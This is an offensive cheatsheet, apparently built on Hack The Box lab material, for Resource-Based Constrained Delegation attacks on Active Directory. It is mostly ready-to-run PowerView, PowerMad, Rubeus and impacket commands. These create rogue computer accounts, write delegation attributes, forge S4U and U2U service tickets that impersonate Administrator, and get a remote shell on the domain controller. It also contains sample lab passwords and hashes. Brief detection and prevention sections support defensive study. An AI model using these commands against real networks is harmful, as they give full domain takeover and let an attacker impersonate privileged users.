RBCD (Resource-Based Constrained Delegation) Attack Cheatsheet

Prerequisites

Required Conditions

1. Write privileges on target computer object (GenericWrite, GenericAll, WriteProperty, or WriteDACL)
2. Control of an object with SPN (computer account or user with SPN)
3. Domain functional level: Windows Server 2012+

Check Prerequisites

# Windows - Find computers where users have write access
Import-Module C:\Tools\PowerView.ps1
Get-DomainComputer | Get-ObjectAcl -ResolveGUIDs | 
    ?{$_.ActiveDirectoryRights -match "GenericWrite|GenericAll|WriteProperty|WriteDacl"}

---

Method 1: Standard RBCD Attack (Computer Account)

From Windows

Step 1: Create Fake Computer Account

# Using PowerMad
Import-Module .\Powermad.ps1
New-MachineAccount -MachineAccount HACKTHEBOX -Password $(ConvertTo-SecureString "Hackthebox123+!" -AsPlainText -Force)

Step 2: Configure RBCD on Target

Import-Module .\PowerView.ps1

# Get computer SID
$ComputerSid = Get-DomainComputer HACKTHEBOX -Properties objectsid | Select -Expand objectsid

# Create security descriptor
$SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;$($ComputerSid))"
$SDBytes = New-Object byte[] ($SD.BinaryLength)
$SD.GetBinaryForm($SDBytes, 0)

# Set msDS-AllowedToActOnBehalfOfOtherIdentity
$creds = New-Object System.Management.Automation.PSCredential "DOMAIN\user", (ConvertTo-SecureString "password" -AsPlainText -Force)
Get-DomainComputer DC01 | Set-DomainObject -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes} -Credential $creds

Step 3: Get Computer Account Hash

.\Rubeus.exe hash /password:Hackthebox123+! /user:HACKTHEBOX$ /domain:inlanefreight.local
# Note the RC4 hash

Step 4: Perform S4U Attack

.\Rubeus.exe s4u /user:HACKTHEBOX$ /rc4:CF767C9A9C529361F108AA67BF1B3695 /impersonateuser:administrator /msdsspn:cifs/dc01.inlanefreight.local /ptt

# Or with additional services
.\Rubeus.exe s4u /user:HACKTHEBOX$ /rc4:CF767C9A9C529361F108AA67BF1B3695 /impersonateuser:administrator /msdsspn:cifs/dc01.inlanefreight.local /altservice:host,RPCSS,wsman,http,ldap,krbtgt,winrm /ptt

From Linux

Step 1: Create Computer Account

# Using Impacket
impacket-addcomputer -computer-name 'HACKTHEBOX$' -computer-pass 'Hackthebox123+!' -dc-ip 10.129.205.35 inlanefreight.local/carole.holmes

Step 2: Configure RBCD

# Using rbcd.py
impacket-rbcd -delegate-from HACKTHEBOX$ -delegate-to DC01$ -dc-ip 10.129.205.35 -action write INLANEFREIGHT.LOCAL/carole.holmes:'Y3t4n0th3rP4ssw0rd'

Step 3: Get Service Ticket

# Get TGS for Administrator
impacket-getST -spn cifs/DC01.inlanefreight.local -impersonate Administrator -dc-ip 10.129.205.35 inlanefreight.local/HACKTHEBOX:'Hackthebox123+!'

# Export ticket
export KRB5CCNAME=./Administrator.ccache

Step 4: Connect to Target

# Using psexec
impacket-psexec -k -no-pass dc01.inlanefreight.local

# Or wmiexec
impacket-wmiexec -k -no-pass dc01.inlanefreight.local

# Remember to add to /etc/hosts:
# 10.129.205.35 dc01.inlanefreight.local

---

Method 2: RBCD with Normal User Account (When MachineAccountQuota = 0)

Prerequisites

• User's password or NT hash
• RC4 must be enabled on the domain
• User must be added to target's msDS-AllowedToActOnBehalfOfOtherIdentity

From Linux

Step 1: Get NT Hash from Password

pypykatz crypto nt 'B3thR!ch@rd$'
# Output: de3d16603d7ded97bb47cd6641b1a392

Step 2: Get TGT

impacket-getTGT INLANEFREIGHT.LOCAL/beth.richards -hashes :de3d16603d7ded97bb47cd6641b1a392 -dc-ip 10.129.205.35

Step 3: Extract Session Key

impacket-describeTicket beth.richards.ccache | grep 'Ticket Session Key'
# Output: 7c3d8b8b135c7d574e423dcd826cab58

Step 4: Change User Password to Match Session Key

impacket-changepasswd INLANEFREIGHT.LOCAL/beth.richards@10.129.205.35 -hashes :de3d16603d7ded97bb47cd6641b1a392 -newhash :7c3d8b8b135c7d574e423dcd826cab58

Step 5: Request Service Ticket with U2U

KRB5CCNAME=beth.richards.ccache impacket-getST -u2u -impersonate Administrator -spn TERMSRV/DC01.INLANEFREIGHT.LOCAL -no-pass INLANEFREIGHT.LOCAL/beth.richards -dc-ip 10.129.205.35

Step 6: Connect to Target

KRB5CCNAME=Administrator@TERMSRV_DC01.INLANEFREIGHT.LOCAL@INLANEFREIGHT.LOCAL.ccache impacket-wmiexec DC01.INLANEFREIGHT.LOCAL -k -no-pass

From Windows (Modified Rubeus)

# Requires custom Rubeus build with U2U support and password change functionality
# Not included in standard Rubeus - requires modification as described in the research

---

Common SPNs to Target

Service	SPN
SMB/CIFS	cifs/target.domain.local
WinRM	http/target.domain.local or wsman/target.domain.local
PowerShell Remoting	http/target.domain.local
RDP	termsrv/target.domain.local
LDAP	ldap/target.domain.local
WMI	host/target.domain.local

---

Troubleshooting

Common Errors

Error	Cause	Solution
KDC_ERR_S_PRINCIPAL_UNKNOWN	User doesn't have SPN	Use U2U method or computer account
KDC_ERR_BADOPTION	KDC can't decrypt ticket	Check if password change worked
KRB_AP_ERR_SKEW	Time sync issue	Sync time with DC
Access Denied	Wrong SPN or insufficient privileges	Try different SPNs (cifs, host, etc.)

Verification Commands

# Check if RBCD is configured
impacket-rbcd -dc-ip 10.129.205.35 -t DC01 -action read inlanefreight\\user:password

# List computer accounts you created
Get-DomainComputer -Identity HACKTHEBOX$

# Check current ticket
klist

---

Cleanup

Remove RBCD Configuration

# Windows
Get-DomainComputer DC01 | Set-DomainObject -Clear 'msds-allowedtoactonbehalfofotheridentity' -Credential $creds

# Linux - Clear RBCD
impacket-rbcd -dc-ip 10.129.205.35 -t DC01 -action remove -f HACKTHEBOX inlanefreight\\user:password

Remove Computer Account

# Windows
Remove-ADComputer -Identity "HACKTHEBOX" -Credential $creds

---

Detection Indicators

• Event ID 4741: Computer account created
• Event ID 4742: Computer account changed
• Event ID 4724: Password reset attempt
• Event ID 4768: TGT requested (RC4 encryption)
• Event ID 4769: Service ticket requested (S4U2Self/S4U2Proxy)
• Unusual changes to msDS-AllowedToActOnBehalfOfOtherIdentity attribute

---

Prevention

1. Set ms-DS-MachineAccountQuota to 0
2. Disable RC4 encryption in Kerberos
3. Monitor and restrict write permissions on computer objects
4. Enable Protected Users group for sensitive accounts
5. Monitor for RBCD attribute modifications
6. Implement PAC validation

---

Tools Reference

Windows Tools

• PowerView: AD enumeration and manipulation
• PowerMad: Computer account creation
• Rubeus: Kerberos attack tool
• Mimikatz: Credential extraction

Linux Tools

• Impacket Suite:
• addcomputer.py: Create computer accounts
• getTGT.py: Request TGTs
• getST.py: Request service tickets
• psexec.py, wmiexec.py, smbexec.py: Remote execution
• describeTicket.py: Parse ticket details
• changepasswd.py: Change passwords
• rbcd.py: RBCD configuration tool
• BloodHound.py: AD enumeration
• pypykatz: Password/hash operations